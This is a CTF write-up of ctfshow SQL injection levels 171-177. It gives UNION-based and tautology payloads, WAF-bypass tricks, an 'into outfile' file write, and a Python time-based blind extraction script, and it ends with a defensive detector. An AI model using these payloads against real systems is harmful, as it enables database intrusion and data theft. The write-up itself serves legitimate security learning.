ctfshow web beginner: SQL injection 171-177


web171

SQL statement:

```php
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

The first level has no real filtering, so the universal injection works directly: payload `1' or 1=1 --+`

Alternatively, first get the table name, then query it:

1. payload `1' union select 1,2,database() --+`, or `union select 1,2,schema_name from information_schema.schemata`, to get the database name
2. payload `1' union select 1,2,table_name from information_schema.tables where table_schema=database() --+` to get the table name
3. payload `1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+` to get the column names
4. payload `1' union select id,username,password from ctfshow_user --+` to get the flag

web172

Query statement

```php
// concatenate the SQL statement to look up the user with the given ID
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic

```php
// check whether the result contains flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }
```

Compared with the previous level, this one adds a check that the returned username value is not flag. The flag we want is in the password column, so this does not affect us.

Payloads:

```sql
1' union select 1,database() --+
1' union select 1,table_name from information_schema.tables where table_schema=database() --+
1' union select 1,column_name from information_schema.columns where table_name='ctfshow_user2' --+
1' union select 1,password from ctfshow_user2 --+
```

Or:

```sql
1' union select to_base64(username),password from ctfshow_user2 where username='flag' --+
```

Knowledge point 1: the encoding functions to_base64() and hex().

web173

Query statement

```php
// concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic

```php
// check whether the result contains flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
```

Same as web172.

web174

Query statement

```php
// concatenate the SQL statement to look up the user with the given ID
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic

```php
// check whether the result contains flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
```

The returned value may contain neither flag nor any digit. We can use SQL's replace() to substitute letters for the digits, then write a script to swap them back.

Payload:

```sql
1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),'3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+
```

Then the script that swaps them back:

```python
# Value returned by the web174 payload, with every digit replaced by numa..numj
a = 'ctfshow{fnumcnumjdnumfnumbnuminumi-numgnumcnuminuma-numeabe-numjnuminumfd-eanuminumgnumfnumbnumenumbnumbnumgnumcnumc}'

# Map each placeholder back to its digit (numa -> 0, ..., numj -> 9)
for digit, token in enumerate(['numa', 'numb', 'numc', 'numd', 'nume',
                               'numf', 'numg', 'numh', 'numi', 'numj']):
    a = a.replace(token, str(digit))
print(a)
```

This yields the flag.

web175

Query statement

```php
// concatenate the SQL statement to look up the user with the given ID
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic

```php
// check whether the result contains flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
```

ASCII characters are filtered from the response, so we can use blind injection, or use file writing to drop the result into the web root.

Solution one

```sql
1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+
```

Then visit 1.txt.

Solution two

```python
# @Author:Y4tacker
import requests

url = "http://57e00653-fc1c-474b-9281-8f1dffb0bc34.challenge.ctf.show:8080/api/v5.php?id=1' and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    # Binary search the ASCII value of the i-th password character.
    # sleep(2) fires when the character is greater than mid, and the
    # 0.5 s timeout turns that delay into an exception.
    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select  password from ctfshow_user5 where username=\'flag\' limit 0,1),{i},1))>{mid},sleep(2),0) -- -'
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid          # answered in time: character <= mid
        except Exception as e:
            head = mid + 1      # timed out: character > mid

    # ascii('') is 0 once i runs past the end, so the search bottoms out at 32
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
```


web176

Query statement

```php
// concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic

```php
// the incoming parameter is filtered
  function waf($str){
   // code too simple to be worth showing
  }
```

The payload `1' union select 1,2,password from ctfshow_user --+` errors at first. Since SQL keywords are case-insensitive, try a case-variation bypass: payload `1' union sElect 1,2,password from ctfshow_user --+` gets through.

web177

Query statement

```php
// concatenate the SQL statement to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Return logic

```php
// the incoming parameter is filtered
  function waf($str){
   // code too simple to be worth showing
  }
```

Entering `1'--+` returns no data. Switching to a different comment style, payload `1'%23`, works, so the guess is that spaces are filtered. First try the universal password.

Solution one: payload `1'or(1=1)%23`

Knowledge point: in SQL, `/**/` can stand in for a space.

Solution two: payload `1'/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user/**/where/**/username='flag'/**/limit/**/1,1%23`
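As an added defender-side example (my own code, not part of this writeup), a small request-level detector that undoes the evasions these levels rely on, namely mixed-case keywords (web176) and `/**/` or `%23` standing in for spaces and comments (web177), before matching. The sample id values are constructed from the payload shapes above and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values of the id= parameter, modelled on the payload
# shapes walked through above (web171-web177). Not captured traffic.
SAMPLES = [
    "1",
    "1' or 1=1 --+",
    "1' union sElect 1,2,password from ctfshow_user --+",
    "1'/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user%23",
    "1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+",
    "1' and 1=if(ascii(substr((select password from ctfshow_user5),1,1))>64,sleep(2),0) -- -",
    "1'or(1=1)%23",
]

def normalize(value: str) -> str:
    """Undo the evasions the waf() in web176/web177 was beaten with."""
    s = unquote_plus(value)            # %23 -> '#', '+' -> ' '
    s = re.sub(r"/\*.*?\*/", " ", s)   # /**/ used in place of a space
    s = re.sub(r"\s+", " ", s)         # collapse runs of whitespace
    return s.lower()                   # sElect -> select

# Each rule is matched against the normalized string only.
RULES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
    "tautology":    re.compile(r"\bor\s*\(?\s*1\s*=\s*1"),
    "file_write":   re.compile(r"\binto\s+(out|dump)file\b"),
    "time_based":   re.compile(r"\b(sleep|benchmark)\s*\("),
    "comment_term": re.compile(r"(--\s|#)"),
    "quote_break":  re.compile(r"'"),
}
# A lone quote or comment is weak evidence; these rules are not.
STRONG = {"union_select", "schema_probe", "tautology", "file_write", "time_based"}

def classify(value: str) -> list:
    """Names of every rule that fires on the normalized value."""
    s = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(s)]

def is_injection(value: str) -> bool:
    """True when at least one strong rule fires."""
    return any(name in STRONG for name in classify(value))

if __name__ == "__main__":
    for v in SAMPLES:
        print(f"{is_injection(v)!s:5}  {classify(v)}  <- {v}")
```

The normalization step is the whole point: a keyword blacklist that matches the raw parameter, as waf() here evidently does, is beaten by exactly the case and comment tricks the levels above use, and the durable fix remains a parameterized query rather than a better regex.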


Article author: Rolemee
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit Rolemee as the source when republishing!